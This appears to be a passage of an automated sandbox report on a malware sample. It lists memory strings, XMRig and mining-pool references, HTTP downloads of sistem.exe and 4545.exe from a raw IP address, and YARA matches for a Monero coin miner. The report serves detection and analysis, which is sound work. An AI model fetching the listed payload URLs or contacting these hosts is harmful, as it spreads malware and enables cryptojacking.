Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: mine.bmpool.org
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: unknown TCP traffic detected without corresponding DNS query: 95.143.179.185
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
